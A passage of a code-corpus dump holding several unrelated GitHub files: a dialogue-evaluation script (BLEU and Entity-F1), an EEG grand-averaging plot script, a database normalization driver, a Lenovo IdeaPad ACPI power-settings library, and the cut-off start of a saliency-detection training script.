print("stopień grafu: %d" % stopien_grafu(l))
| JuliaHardy/graphs | grafy_1.py | grafy_1.py | py | 962 | python | pl | code | 0 | github-code | 90 |
20905146452 | import argparse
import json
import re
import string
from paddlenlp.metrics import BLEU
def setup_args():
    """Build the CLI parser and return the parsed arguments.

    All four options are required; --dataset is restricted to the three
    supported corpora.
    """
    parser = argparse.ArgumentParser()
    parser.add_argument(
        "--dataset", type=str, choices=["SMD", "CamRest", "MultiWOZ"], required=True
    )
    for flag in ("--pred_file", "--entity_file", "--save_file"):
        parser.add_argument(flag, type=str, required=True)
    return parser.parse_args()
def evaluate(args):
    """Main evaluation function.

    Loads the prediction file, collects (generated, reference) response
    pairs for every system turn, scores them with BLEU and Entity-F1,
    prints the results and writes them to args.save_file as JSON.
    """
    with open(args.pred_file, "r") as fin:
        data = json.load(fin)
    print(f"Load prediction file from: {args.pred_file}")
    preds = []
    refs = []
    for dial in data:
        for turn in dial["dialogue"]:
            if turn["turn"] == "system":
                # MultiWOZ predictions are normalized before scoring.
                if args.dataset == "MultiWOZ":
                    preds.append(preprocess_text(turn["generated_response"]))
                else:
                    preds.append(turn["generated_response"])
                refs.append(turn["utterance"])
    assert len(preds) == len(refs), f"{len(preds)} != {len(refs)}"
    bleu_metric = BLEUMetric()
    entity_metric = EntityMetric(args)
    bleu_res = bleu_metric.evaluate(preds, refs)
    entity_res = entity_metric.evaluate(preds, refs)
    results = {
        "BLEU": bleu_res,
        "Entity-F1": entity_res
    }
    print(json.dumps(results, indent=2))
    with open(args.save_file, "w") as fout:
        json.dump(results, fout, indent=2)
    return
class BLEUMetric(object):
    """BLEU Metric for Response."""
    def __init__(self):
        # paddlenlp corpus-level BLEU accumulator.
        self.metric = BLEU()
    def evaluate(self, preds, refs):
        """Return the corpus BLEU score of *preds* against *refs*."""
        preds, refs = self._process_text(preds, refs)
        for pred, ref in zip(preds, refs):
            self.metric.add_inst(pred, ref)
        bleu = self.metric.score()
        return bleu
    def _process_text(self, preds, refs):
        """Lower-case and whitespace-tokenize; wrap each ref in a list
        because BLEU accepts multiple references per instance."""
        _preds = [pred.strip().lower().split(" ") for pred in preds]
        _refs = [[ref.strip().lower().split(" ")] for ref in refs]
        return _preds, _refs
class EntityMetric(object):
    """Entity Metric for Response.

    Matches knowledge-base entity strings inside generated/reference
    responses and scores them with micro-averaged F1.
    """
    def __init__(self, args):
        self.dataset = args.dataset
        self.entities = self._load_entities(args.entity_file)
    def evaluate(self, preds, refs):
        """Return Entity-F1 of *preds* against *refs*."""
        extracted_preds_entities = []
        extracted_refs_entities = []
        for pred, ref in zip(preds, refs):
            pred_entities = self._extract_entities(pred)
            ref_entities = self._extract_entities(ref)
            extracted_preds_entities.append(pred_entities)
            extracted_refs_entities.append(ref_entities)
        entity_f1 = self._compute_entity_f1(extracted_preds_entities, extracted_refs_entities)
        return entity_f1
    def _load_entities(self, entities_file):
        """Load the KB entity list, applying dataset-specific expansions.

        Entities are lower-cased and sorted longest-first so that longer
        matches win during extraction.
        """
        with open(entities_file, "r") as fin:
            raw_entities = json.load(fin)
        entities = set()
        if self.dataset == "SMD":
            for slot, values in raw_entities.items():
                for val in values:
                    if slot == "poi":
                        entities.add(val["address"])
                        entities.add(val["poi"])
                        entities.add(val["type"])
                    elif slot == "distance":
                        entities.add(f"{val} miles")
                    elif slot == "temperature":
                        entities.add(f"{val}f")
                    else:
                        entities.add(val)
            # add missing entities
            missed_entities = ["yoga", "tennis", "swimming", "football", " lab ", "doctor", "optometrist", "dentist",
                               "1st", "2nd", "3rd", "4th", "5th", "6th", "7th", "8th", "9th", "10th", "11th", "12th",
                               "13th", "14th", "15th", "16th", "17th", "18th", "19th", "20th", "jill", "jack", " hr "]
            for missed_entity in missed_entities:
                entities.add(missed_entity)
            # special handle of "hr"
            # NOTE(review): removes bare "hr" (expected to come from the
            # entity file; the padded " hr " added above remains).
            entities.remove("hr")
        else:
            for slot, values in raw_entities.items():
                for val in values:
                    if self.dataset == "MultiWOZ" and slot == "choice":
                        val = f"choice-{val}"
                    entities.add(val)
        processed_entities = []
        for val in entities:
            processed_entities.append(val.lower())
        processed_entities.sort(key=lambda x: len(x), reverse=True)
        return processed_entities
    def _extract_entities(self, response):
        """Return the KB entities found in *response* (longest-first scan)."""
        def _is_sub_str(str_list, sub_str):
            # True when sub_str is contained in an already-extracted entity.
            for str_item in str_list:
                if sub_str in str_item:
                    return True
            return False
        response = f" {response} ".lower()
        extracted_entities = []
        if self.dataset == "SMD":
            # preprocess response: normalize time and temperature spans so
            # they match the canonical entity strings.
            for h in range(0, 13):
                response = response.replace(f"{h} am", f"{h}am")
                response = response.replace(f"{h} pm", f"{h}pm")
            for low_temp in [20, 30, 40, 50, 60, 70, 80, 90, 100]:
                for high_temp in [20, 30, 40, 50, 60, 70, 80, 90, 100]:
                    response = response.replace(f"{low_temp}-{high_temp}f", f"{low_temp}f-{high_temp}f")
        for entity in self.entities:
            if self.dataset == "MultiWOZ":
                # MultiWOZ needs contextual rules to disambiguate generic
                # entity words ("many", "all", "free", "centre", ...).
                success_tag = False
                if entity.startswith("choice-"):
                    entity = entity[7:]
                    if entity == "many":
                        if entity in re.sub(r"(many (other types|food types|cuisines)|how many)", " ", response):
                            success_tag = True
                    elif entity == "all":
                        if re.search(r"all (of the|expensive|moderate|cheap)", response):
                            success_tag = True
                    elif entity == "to":
                        success_tag = False
                    else:
                        if re.search(f"(there are|there is|found|have about|have)( only|) {entity}", response):
                            success_tag = True
                elif entity == "centre":
                    if entity in response.replace("cambridge towninfo centre", " "):
                        success_tag = True
                elif entity == "free":
                    if re.search(r"free (parking|internet|wifi)", response):
                        success_tag = True
                elif entity in response or entity.lower() in response.lower():
                    success_tag = True
                if success_tag:
                    extracted_entities.append(entity)
                    # Blank out the match so shorter entities cannot re-match it.
                    response = response.replace(entity, " ")
            else:
                if entity in response and not _is_sub_str(extracted_entities, entity):
                    extracted_entities.append(entity)
        return extracted_entities
    def _compute_entity_f1(self, preds, refs):
        """Compute Entity-F1."""
        def _count(pred, ref):
            # Per-instance true/false positives and false negatives.
            tp, fp, fn = 0, 0, 0
            if len(ref) != 0:
                for g in ref:
                    if g in pred:
                        tp += 1
                    else:
                        fn += 1
                for p in set(pred):
                    if p not in ref:
                        fp += 1
            return tp, fp, fn
        tp_all, fp_all, fn_all = 0, 0, 0
        for pred, ref in zip(preds, refs):
            tp, fp, fn = _count(pred, ref)
            tp_all += tp
            fp_all += fp
            fn_all += fn
        # Micro-averaged precision/recall/F1 with divide-by-zero guards.
        precision = tp_all / float(tp_all + fp_all) if (tp_all + fp_all) != 0 else 0
        recall = tp_all / float(tp_all + fn_all) if (tp_all + fn_all) != 0 else 0
        f1 = 2 * precision * recall / float(precision + recall) if (precision + recall) != 0 else 0
        return f1
def preprocess_text(text):
    """Preprocess utterance and table value.

    Lower-cases, converts tabs to spaces, pads every punctuation mark
    with surrounding spaces, and collapses repeated whitespace.
    """
    cleaned = text.strip().replace("\t", " ").lower()
    pad_punctuation = str.maketrans({p: f" {p} " for p in string.punctuation})
    return " ".join(cleaned.translate(pad_punctuation).split())
# Script entry point: parse CLI options and run the evaluation.
if __name__ == "__main__":
    args = setup_args()
    evaluate(args)
| PaddlePaddle/Research | NLP/EMNLP2022-Q-TOD/evaluate.py | evaluate.py | py | 8,283 | python | en | code | 1,671 | github-code | 90 |
23530212542 | #!/usr/bin/env python3
import os
import sys
import glob
import argparse
import logging
import coloredlogs
import datetime
import numpy as np
from matplotlib import pyplot as plt
import mne
# Baseline to the average of the section from the start of the epoch to the event
BASELINE = (None, 0.1)
# Expected number of samples in a decimated statistics file
EXPECTED_SAMPLES = 2731
timestamp = datetime.datetime.now().isoformat()
# CLI: subjects to average, an optional run name (defaults to timestamp),
# verbosity and a debug flag that drops into IPython after loading.
parser = argparse.ArgumentParser(description='Automate FMed study grand averaging of MMN.')
parser.add_argument('-v', '--verbose', action='count', default=0)
parser.add_argument('-n', '--name', default=timestamp.replace(":","."))
parser.add_argument('--debug', action="store_true")
parser.add_argument('subject', nargs='+')
args = parser.parse_args()
if args.verbose > 0:
    coloredlogs.install(level='DEBUG')
else:
    coloredlogs.install(level='INFO')
INPUT_DIR = "/study/thukdam/analyses/eeg_statistics/mmn"
OUTPUT_DIR = f"/scratch/dfitch/plots/{args.name}"
os.makedirs(OUTPUT_DIR, exist_ok=True)
# Shared time axis, fixed by the first correctly-sampled file read
# (see read_evokeds below).
GOOD_TIMES = None
# Record the exact command line and subject list alongside the plots.
with open(f"{OUTPUT_DIR}/README.txt", 'w') as f:
    f.write(' '.join(sys.argv) + "\n\n")
    f.write(f"Generated on {timestamp} and written to {args.name} from the following subjects:\n")
    for item in args.subject:
        f.write("%s\n" % item)
logging.info(f"Reading {args.subject} from {INPUT_DIR} and writing to {OUTPUT_DIR}")
def read_evokeds(f):
    """Read an -ave.fif evoked file, forcing legacy files onto the shared grid.

    Baseline correction (BASELINE) is applied on load.  The first file
    with the expected sample count fixes the module-level GOOD_TIMES
    axis; later files with a different decimation are resampled and have
    their time axis overwritten to match.
    NOTE(review): if the very first file read is mis-sampled, GOOD_TIMES
    is still None when assigned -- assumes a well-sampled file comes first.
    """
    global GOOD_TIMES
    es = mne.read_evokeds(f, baseline=BASELINE)
    if es[0].data.shape[1] != EXPECTED_SAMPLES:
        """
        Now, we're expecting a certain sample rate so that we end up with 2731 samples from these arrays.
        But we have old cruddy data that has been decimated differently.
        So we resample and force the timepoints to be identical (there's a little jitter)
        So far we only hit one file, so I am being a bad person and hard coding a resampling rate
        that will get files like that one to match. If this does NOT fix future files, we'll have
        to figure out how to get at the sample rate of the MNE Evoked lists, and do it dynamically.
        Couldn't find it in a few hours of poking.
        """
        logging.warning(f"Resampling on {f}, did not get expected decimated statistics length {EXPECTED_SAMPLES}")
        es[0].resample(5441)
        es[0].times = GOOD_TIMES
    else:
        GOOD_TIMES = es[0].times
    return es
# Collect per-subject evoked responses for all/standard/deviant conditions.
total = []
standard = []
deviant = []
for sid in args.subject:
    # Find the statistics files for this subject
    def find_file(kind):
        # Locate the single "*<kind>-ave.fif" file for subject sid;
        # abort the whole run if it is missing.
        path = f"{INPUT_DIR}/{sid}/*{kind}-ave.fif"
        find = glob.glob(path)
        if len(find) == 0:
            logging.fatal(f"No {kind} summary file found for {sid}")
            sys.exit(1)
        return find[0]
    total_file = find_file("all")
    standard_file = find_file("standard")
    deviant_file = find_file("deviant")
    total += read_evokeds(total_file)
    standard += read_evokeds(standard_file)
    deviant += read_evokeds(deviant_file)
if args.debug:
    from IPython import embed; embed()
# Grand averages weighted by each subject's number of averaged epochs;
# the difference wave is deviant minus standard with equal weights.
all_average = mne.combine_evoked(total, weights='nave')
standard_average = mne.combine_evoked(standard, weights='nave')
deviant_average = mne.combine_evoked(deviant, weights='nave')
difference_average = mne.combine_evoked([deviant_average, -standard_average], weights='equal')
logging.info(f"Read {args.subject} from {INPUT_DIR}, creating plots in {OUTPUT_DIR}")
evoked = dict()
evoked["Standard"] = standard_average
evoked["Deviant"] = deviant_average
evoked["Difference"] = difference_average
colors = dict(Standard="Green", Deviant="Red", Difference="Black")
def plot_dms(electrode, scale=2.5, auto=False):
    """Plot the Standard/Deviant/Difference grand-average comparison for one electrode.

    electrode: channel name (e.g. "Cz"), or None to combine across all channels.
    scale: symmetric y-axis limit (ignored when auto=True).
    auto: let MNE auto-scale the y axis instead of using `scale`.
    Saves the figure as a PNG under OUTPUT_DIR.
    """
    if electrode is None:
        pick = "all"
        electrode = "all"
    else:
        pick = standard_average.ch_names.index(electrode)
    fig, ax = plt.subplots(figsize=(4, 8/3))
    kwargs = dict(axes=ax, picks=pick,
                  truncate_yaxis=False,
                  truncate_xaxis=False,
                  colors=colors,
                  split_legend=True,
                  legend='lower right',
                  show_sensors=False,
                  ci=0.95,
                  show=False)
    if pick == "all":
        # Default is gfp (global field power), let's use mean plz
        kwargs['combine'] = 'mean'
    if auto:
        name = "auto"
        mne.viz.plot_compare_evokeds(evoked, **kwargs)
    else:
        name = str(scale)
        mne.viz.plot_compare_evokeds(evoked, ylim=dict(eeg=[-1 * scale, scale]), **kwargs)
    filename = f"{OUTPUT_DIR}/{args.name}_{name}_{electrode}.png"
    fig.savefig(filename, dpi=300, bbox_inches="tight")
    # Bug fix: this line previously logged the literal text "(unknown)"
    # instead of the actual output path.
    logging.info(f"Plot for mmn grand average on {electrode} saved to {filename}")
# Render fixed-scale (±6 µV) comparison plots for the electrodes of interest.
plot_dms("Cz", 6.0)
plot_dms("Fz", 6.0)
plot_dms("Pz", 6.0)
plot_dms("T8", 6.0)
| uwmadison-chm/paper-fin-lott-2020 | mmn_grand_average.py | mmn_grand_average.py | py | 4,769 | python | en | code | 0 | github-code | 90 |
18776051797 | # This is the main file for reading CSV data and performing normalization operations
import pandas as pd
import csv
import normalization_procedures
import input_parser
from sql_table_creator import generate_1nf, generate_2nf_3nf, generate_bcnf_4nf_5nf
# Reading the input csv file and the dependencies text file
input_file = pd.read_csv('/content/exampleInputTable.csv')
print('Input Relation Tables:')
print(input_file)
print('\n')
with open('/content/dependency_parser.txt', 'r') as file:
    lines = [line.strip() for line in file]
# Parse functional dependencies of the form "A, B -> C, D" into
# {('A', 'B'): ['C', 'D']}.
dependencies = {}
for line in lines:
    left_hand_side, right_hand_side = line.split(" -> ")
    left_hand_side = left_hand_side.split(", ")
    dependencies[tuple(left_hand_side)] = right_hand_side.split(", ")
print('Dependencies:')
print(dependencies)
print('\n')
# Input from the user
target_normal_form = input(
    'Choice of the highest normal form to reach (1: 1NF, 2: 2NF, 3: 3NF, B: BCNF, 4: 4NF, 5: 5NF):')
# Numeric choices become ints so they can be compared with >=; 'B' stays a string.
if target_normal_form in ["1", "2", "3", "4", "5"]:
    target_normal_form = int(target_normal_form)
# Find the highest normal form of the input relation
find_high_nf = int(
    input('Find the highest normal form of the input table? (1: Yes, 2: No):'))
high_nf = 'No normalization done.'
primary_key = input(
    "Enter the Primary Key values: ").split(', ')
print('\n')
# Convert the primary-key list into a tuple (used as a composite key below).
keys = ()
for key in primary_key:
    keys = keys + (key,)
primary_key = keys
# Multi-valued dependencies ("A ->-> B") are only needed for 4NF/5NF.
mvd_dependencies = {}
if not target_normal_form == 'B' and target_normal_form >= 4:
    with open('/content/mvd_dependencies.txt', 'r') as file:
        mvd_lines = [line.strip() for line in file]
        print(mvd_lines)
    for mvd in mvd_lines:
        left_hand_side, right_hand_side = mvd.split(" ->-> ")
        left_hand_side = left_hand_side.split(
            ", ") if ", " in left_hand_side else [left_hand_side]
        # The stringified LHS list is used as the dict key; each LHS may
        # determine several RHS attribute sets.
        left_hand_side_str = str(left_hand_side)
        if left_hand_side_str in mvd_dependencies:
            mvd_dependencies[left_hand_side_str].append(right_hand_side)
        else:
            mvd_dependencies[left_hand_side_str] = [right_hand_side]
    print('Multi-valued Dependencies')
    print(mvd_dependencies)
    print('\n')
input_file = input_parser.input_parser(input_file)
# Cascade through the normal forms. Each stage validates the previous stage's
# output, records whether the table was already in that form, and (when the
# user's target is exactly this stage) emits the CREATE TABLE queries.
# ---- 1NF ----
if target_normal_form == 'B' or target_normal_form >= 1:
    first_nf_table, flag_1nf = normalization_procedures.validate_first_nf(
        input_file)
    if flag_1nf:
        high_nf = 'Highest Normal Form is: 1NF'
    if target_normal_form == 1:
        if flag_1nf:
            print('Already Normalized to 1NF')
            print('\n')
        print('Queries after decomposing to 1NF:')
        print('\n')
        generate_1nf(primary_key, first_nf_table)
# ---- 2NF ----
if target_normal_form == 'B' or target_normal_form >= 2:
    second_nf_tables, flag_2nf = normalization_procedures.validate_second_nf(
        first_nf_table, primary_key, dependencies)
    if flag_1nf and flag_2nf:
        high_nf = 'Highest Normal Form is: 2NF'
    if target_normal_form == 2:
        if flag_2nf and flag_1nf:
            print('Already Normalized to 2NF')
            print('\n')
        print('Queries after decomposing to 2NF')
        print('\n')
        generate_2nf_3nf(second_nf_tables)
# ---- 3NF ----
if target_normal_form == 'B' or target_normal_form >= 3:
    third_nf_tables, flag_3nf = normalization_procedures.validate_third_nf(
        second_nf_tables, primary_key, dependencies)
    if flag_1nf and flag_2nf and flag_3nf:
        high_nf = 'Highest Normal Form is: 3NF'
    if target_normal_form == 3:
        if flag_3nf and flag_2nf and flag_1nf:
            print('Already Normalized to 3NF')
            print('\n')
        print('Queries after decomposing to 3NF')
        print('\n')
        generate_2nf_3nf(third_nf_tables)
# ---- BCNF ----
if target_normal_form == 'B' or target_normal_form >= 4:
    bcnf_tables, flag_bcnf = normalization_procedures.validate_bc_nf(
        third_nf_tables, primary_key, dependencies)
    if flag_1nf and flag_2nf and flag_3nf and flag_bcnf:
        high_nf = 'Highest Normal Form is: BCNF'
    if target_normal_form == 'B':
        if flag_bcnf and flag_3nf and flag_2nf and flag_1nf:
            print('Already Normalized to BCNF')
            print('\n')
        print('Queries after decomposing to BCNF')
        print('\n')
        generate_bcnf_4nf_5nf(bcnf_tables)
# ---- 4NF (requires multi-valued dependencies) ----
if not target_normal_form == 'B' and target_normal_form >= 4:
    fourth_nf_tables, flag_4nf = normalization_procedures.validate_fourth_nf(
        bcnf_tables, mvd_dependencies)
    if flag_1nf and flag_2nf and flag_3nf and flag_bcnf and flag_4nf:
        high_nf = 'Highest Normal Form is: 4NF'
    if target_normal_form == 4:
        if flag_4nf and flag_bcnf and flag_3nf and flag_2nf and flag_1nf:
            print('Already Normalized to 4NF')
            print('\n')
        print('Queries after decomposing to 4NF')
        print('\n')
        generate_bcnf_4nf_5nf(fourth_nf_tables)
# ---- 5NF ----
if not target_normal_form == 'B' and target_normal_form >= 5:
    fifth_nf_tables, flag_5nf = normalization_procedures.validate_fifth_nf(
        fourth_nf_tables, primary_key, dependencies)
    if flag_1nf and flag_2nf and flag_3nf and flag_bcnf and flag_4nf and flag_5nf:
        high_nf = 'Highest Normal Form is: 5NF'
    if target_normal_form == 5:
        if flag_5nf and flag_4nf and flag_bcnf and flag_3nf and flag_2nf and flag_1nf:
            print('Already Normalized to 5NF')
            print('\n')
        print('Queries after decomposing to 5NF')
        print('\n')
        generate_bcnf_4nf_5nf(fifth_nf_tables)
# Report the highest normal form detected, if the user asked for it.
if find_high_nf == 1:
    print('\n')
    print(high_nf)
    print('\n')
| hemanthmandava2181/Database-Project | main.py | main.py | py | 5,794 | python | en | code | 0 | github-code | 90 |
72481009576 | class IPPowerError(Exception):
pass
class IPPowerValueError(IPPowerError):
    """Raised when a value passed to, or returned by, the ACPI is invalid."""

    def get_bad_value(self):
        """Return the offending value, or None when none was recorded."""
        return getattr(self, "_bad_value", None)

    def set_bad_value(self, bad_value):
        """Attach the offending value to this exception; returns self for chaining."""
        self._bad_value = bad_value
        return self
class IPPowerAccessError(IPPowerError):
    """Raised when the ACPI call interface is missing or not accessible."""

    def get_description(self):
        """Return the human-readable failure description, or None if unset."""
        return getattr(self, "_description", None)

    def set_description(self, description):
        """Attach a human-readable description; returns self for chaining."""
        self._description = description
        return self
class IPPowerVerificationError(IPPowerError):
    """Raised when a setting was written but the read-back value does not match."""
    pass
class IPPower:
    """Control Lenovo IdeaPad power features through the acpi_call kernel module.

    Reads and writes /proc/acpi/call to query and set the performance mode,
    rapid-charge switch, and battery-conservation switch. Requires the
    acpi_call module to be loaded and read/write access to the proc file
    (usually root).
    """

    LIBRARY_VERSION = 1
    _ACPI_CALL_PATH = "/proc/acpi/call"
    # Values of these constants are taken from the Arch Wiki:
    # https://wiki.archlinux.org/index.php/Lenovo_IdeaPad_5_15are05
    IP_PERFMODE_INTELLIGENT = r'0x000FB001'
    IP_PERFMODE_PERFORMANCE = r'0x0012B001'
    IP_PERFMODE_BATTERYSAVE = r'0x0013B001'
    IP_RAPIDCHARGE_ON = r'0x07'
    IP_RAPIDCHARGE_OFF = r'0x08'
    IP_BATCONSERV_ON = r'0x03'
    IP_BATCONSERV_OFF = r'0x05'
    # ACPI method paths: the first three are read-only status registers,
    # the last three are setter methods that take an argument.
    _ACPI_GET_PERFMODE = r'\_SB.PCI0.LPC0.EC0.SPMO'
    _ACPI_GET_RAPIDCHARGE = r'\_SB.PCI0.LPC0.EC0.QCHO'
    _ACPI_GET_BATCONSERV = r'\_SB.PCI0.LPC0.EC0.BTSM'
    _ACPI_SET_PERFMODE = r'\_SB.PCI0.LPC0.EC0.VPC0.DYTC'
    _ACPI_SET_RAPIDCHARGE = r'\_SB.PCI0.LPC0.EC0.VPC0.SBMC'
    _ACPI_SET_BATCONSERV = r'\_SB.PCI0.LPC0.EC0.VPC0.SBMC'
    def __init__(self, show_debug_msgs=False):
        """Validate that the acpi_call interface exists and is accessible.

        Raises IPPowerAccessError when the proc file is missing or not R/W.
        """
        self._show_debug_msgs = show_debug_msgs
        import os
        if not os.path.exists(self._ACPI_CALL_PATH):
            raise IPPowerAccessError("The ACPI call interface doesn't exist on this system!").set_description('"{}" is missing (install the acpi_call kernel module)'.format(self._ACPI_CALL_PATH))
        if not os.access(self._ACPI_CALL_PATH, os.R_OK | os.W_OK):
            raise IPPowerAccessError("You are not permitted to access the ACPI call interface!").set_description('"{}" isn\'t accessible for reading or writing (try running the program as root)'.format(self._ACPI_CALL_PATH))
    def _debug_msg(self, *args):
        """Print a timestamped debug line to stderr when debugging is enabled."""
        if self._show_debug_msgs:
            import sys
            import time
            print("[{} libippower DEBUG]".format(time.strftime("%Y-%m-%d %H:%M:%S")), *args, file=sys.stderr)
    def _acpi_call_read(self):
        """Read the result of the last ACPI call (up to the first NUL byte)."""
        with open(self._ACPI_CALL_PATH) as call_file:
            ret = call_file.read().strip().split("\x00")[0].strip()
        self._debug_msg("Read from ACPI call interface:", ret)
        return ret
    def _acpi_call_write(self, write_data):
        """Write an ACPI method invocation string to the call interface."""
        with open(self._ACPI_CALL_PATH, "w") as call_file:
            print(write_data, file=call_file)
        self._debug_msg("Written to ACPI call interface:", write_data)
    def _generic_get(self, acpi_path):
        """Invoke a read-only ACPI method and return its result string."""
        self._acpi_call_write(acpi_path)
        return self._acpi_call_read()
    def _generic_set(self, acpi_path, value):
        """Invoke an ACPI setter method with the given argument value."""
        call_value = (acpi_path + " " + value)
        self._acpi_call_write(call_value)
    def get_perfmode(self):
        """Return one of the IP_PERFMODE_* constants; raises IPPowerValueError otherwise."""
        perfmode = self._generic_get(self._ACPI_GET_PERFMODE)
        if perfmode == "0x0":
            return self.IP_PERFMODE_INTELLIGENT
        if perfmode == "0x1":
            return self.IP_PERFMODE_PERFORMANCE
        if perfmode == "0x2":
            return self.IP_PERFMODE_BATTERYSAVE
        raise IPPowerValueError("An invalid performance mode was returned by the ACPI!").set_bad_value(perfmode)
    def get_rapidcharge(self):
        """Return IP_RAPIDCHARGE_ON/OFF; raises IPPowerValueError on unknown status."""
        rapidcharge = self._generic_get(self._ACPI_GET_RAPIDCHARGE)
        if rapidcharge == "0x0":
            return self.IP_RAPIDCHARGE_OFF
        if rapidcharge == "0x1":
            return self.IP_RAPIDCHARGE_ON
        raise IPPowerValueError("An invalid rapid charge status was returned by the ACPI!").set_bad_value(rapidcharge)
    def get_batconserv(self):
        """Return IP_BATCONSERV_ON/OFF; raises IPPowerValueError on unknown status."""
        batconserv = self._generic_get(self._ACPI_GET_BATCONSERV)
        if batconserv == "0x0":
            return self.IP_BATCONSERV_OFF
        if batconserv == "0x1":
            return self.IP_BATCONSERV_ON
        raise IPPowerValueError("An invalid battery conservation status was returned by the ACPI!").set_bad_value(batconserv)
    def set_perfmode(self, perfmode):
        """Set the performance mode and verify it took effect by reading it back."""
        if perfmode != self.IP_PERFMODE_INTELLIGENT and perfmode != self.IP_PERFMODE_PERFORMANCE and perfmode != self.IP_PERFMODE_BATTERYSAVE:
            raise IPPowerValueError("An invalid performance mode was provided!").set_bad_value(perfmode)
        self._generic_set(self._ACPI_SET_PERFMODE, perfmode)
        if perfmode != self.get_perfmode():
            raise IPPowerVerificationError("Failed to verify whether the performance mode was set correctly!")
    def set_rapidcharge(self, rapidcharge):
        """Set rapid-charge, first disabling battery conservation if needed (mutually exclusive)."""
        if rapidcharge != self.IP_RAPIDCHARGE_ON and rapidcharge != self.IP_RAPIDCHARGE_OFF:
            raise IPPowerValueError("An invalid rapid charge status was provided!").set_bad_value(rapidcharge)
        # simulating the behaviour of the Lenovo Vantage software
        if rapidcharge == self.IP_RAPIDCHARGE_ON and self.get_batconserv() != self.IP_BATCONSERV_OFF:
            self.set_batconserv(self.IP_BATCONSERV_OFF)
        self._generic_set(self._ACPI_SET_RAPIDCHARGE, rapidcharge)
        if rapidcharge != self.get_rapidcharge():
            raise IPPowerVerificationError("Failed to verify whether the rapid charge status was set correctly!")
    def set_batconserv(self, batconserv):
        """Set battery conservation, first disabling rapid charge if needed (mutually exclusive)."""
        if batconserv != self.IP_BATCONSERV_ON and batconserv != self.IP_BATCONSERV_OFF:
            raise IPPowerValueError("An invalid battery conservation status was provided!").set_bad_value(batconserv)
        # simulating the behaviour of the Lenovo Vantage software
        if batconserv == self.IP_BATCONSERV_ON and self.get_rapidcharge() != self.IP_RAPIDCHARGE_OFF:
            self.set_rapidcharge(self.IP_RAPIDCHARGE_OFF)
        self._generic_set(self._ACPI_SET_BATCONSERV, batconserv)
        if batconserv != self.get_batconserv():
            raise IPPowerVerificationError("Failed to verify whether the battery conservation status was set correctly!")
| ethernetlord/ippower | libippower.py | libippower.py | py | 6,178 | python | en | code | 0 | github-code | 90 |
13393792278 | from model import *
from config import *
import torch.optim as optim
from collections import OrderedDict
def load(path):
    """Load a checkpoint saved from an nn.DataParallel model.

    Strips the leading 'module.' prefix from every key so the weights can
    be loaded into a bare (non-DataParallel) module.
    """
    raw_state = torch.load(path)
    # k[7:] drops the 7-character 'module.' prefix from each key.
    return OrderedDict((key[7:], value) for key, value in raw_state.items())
# Build the DSS-based encoder (D_E), restore its checkpoint, and wrap it for
# multi-GPU execution. NOTE(review): checkpoint paths are hard-coded Windows
# paths — confirm before running elsewhere.
D_E = DSS(*extra_layer(vgg(base['dss'], 3), extra['dss']),e_extract_layer(),nums =BATCH_SIZE).cuda()
#initialize_weights(D_E)
#D_E.base.load_state_dict(torch.load('../vgg16_feat.pth'))
#print(D_E)
D_E.load_state_dict(load('D:\WRm/checkpoints/D_Eepoch3.pkl'))
D_E =nn.DataParallel(D_E).cuda()
# Decoder network (U), restored from its own checkpoint.
U = D_U().cuda()
#initialize_weights(U)
U.load_state_dict(load('D:\WRm/checkpoints/Uepoch3.pkl'))
U =nn.DataParallel(U)
#D_E.base.load_state_dict(torch.load('/home/neverupdate/Downloads/SalGAN-master/weights/vgg16_feat.pth'))
#D_E.load_state_dict(torch.load('./checkpoints/D_Eepoch3.pkl'))
#U.load_state_dict(torch.load('./checkpoints/Uepoch3.pkl'))
# Separate Adam optimizers for encoder and decoder.
DE_optimizer = optim.Adam(D_E.parameters(), lr=config.D_LEARNING_RATE,betas=(0.5,0.999))
U_optimizer = optim.Adam(U.parameters(), lr=config.U_LEARNING_RATE, betas=(0.5, 0.999))
# (image_dir, ground_truth_dir) pairs for training and evaluation datasets.
TR_sal_dirs = [ ("D:\WRM/DUTS/DUTS-TR/DUTS-TR-Image",
             "D:\WRM/DUTS/DUTS-TR/DUTS-TR-Mask")]
TR_ed_dir = [("./images/train",
              "./bon/train")]
TE_sal_dirs = [("D:\WRM/ECSSD (2)/ECSSD-Image",
                "D:\WRM/ECSSD (2)/ECSSD-Mask")]
TE_ed_dir = [("./images/test",
              "./bon/test")]
def DATA(sal_dirs, ed_dir, trainable):
    """Build a DataLoader over paired saliency and edge datasets.

    sal_dirs / ed_dir: lists of (image_dir, ground_truth_dir) pairs.
    trainable: True -> shuffled batches of BATCH_SIZE; False -> single-item,
    unshuffled loading for evaluation.
    """
    sal_imgs, sal_gts = [], []
    for img_dir, gt_dir in sal_dirs:
        sal_imgs.extend(process_data_dir(img_dir))
        sal_gts.extend(process_data_dir(gt_dir))
    edge_imgs, edge_gts = [], []
    for img_dir, gt_dir in ed_dir:
        edge_imgs.extend(process_data_dir(img_dir))
        edge_gts.extend(process_data_dir(gt_dir))
    folder = DataFolder(sal_imgs, sal_gts, edge_imgs, edge_gts, trainable)
    batch = BATCH_SIZE if trainable else 1
    return DataLoader(folder, batch_size=batch, num_workers=2, shuffle=trainable)
train_data = DATA(TR_sal_dirs,TR_ed_dir,trainable=True)
test_data = DATA(TE_sal_dirs,TE_ed_dir,trainable=False)
def cal_eLoss(edges, label):
    """Weighted BCE over the six edge side-outputs; the fused map (index 5) gets 5x weight."""
    weights = (1, 1, 1, 1, 1, 5)
    return sum(wt * F.binary_cross_entropy(pred, label) / 10
               for wt, pred in zip(weights, edges))
def cal_s_mLoss(maps, label):
    """Mean of BCE losses over the six side-output saliency maps."""
    total = 0
    for pred in maps[:6]:
        total = total + F.binary_cross_entropy(pred, label) / 6
    return total
def cal_s_eLoss(es, label):
    """Mean of BCE losses over the five predicted saliency-edge maps."""
    return sum(F.binary_cross_entropy(es[i], label) / 5 for i in range(5))
def cal_e_mLoss(e_m, label):
    """Mean of BCE losses over the first five encoder saliency maps.

    NOTE(review): only five maps are consumed (the original defined six
    weights but iterated five times); preserved as-is.
    """
    loss = 0
    for pred in e_m[:5]:
        loss = loss + F.binary_cross_entropy(pred, label) / 5
    return loss
def cal_s_e2mLoss(e_m, maps):
    """Mean BCE aligning each of the first five encoder maps with the matching decoder map."""
    return sum(F.binary_cross_entropy(e_m[i], maps[i]) / 5 for i in range(5))
# Module-level tracking variables (note: main() shadows these with locals).
best_eval = None
ma = 0
def main(train_data, test_data):
    """Joint training/validation loop for the D_E encoder and U decoder.

    train_data / test_data: DataLoaders yielding batches of
    (img, img_e, sal_l, sal_e, ed_l, name).
    Side effects: saves per-epoch checkpoints under D:\WRM/checkpoints/ and
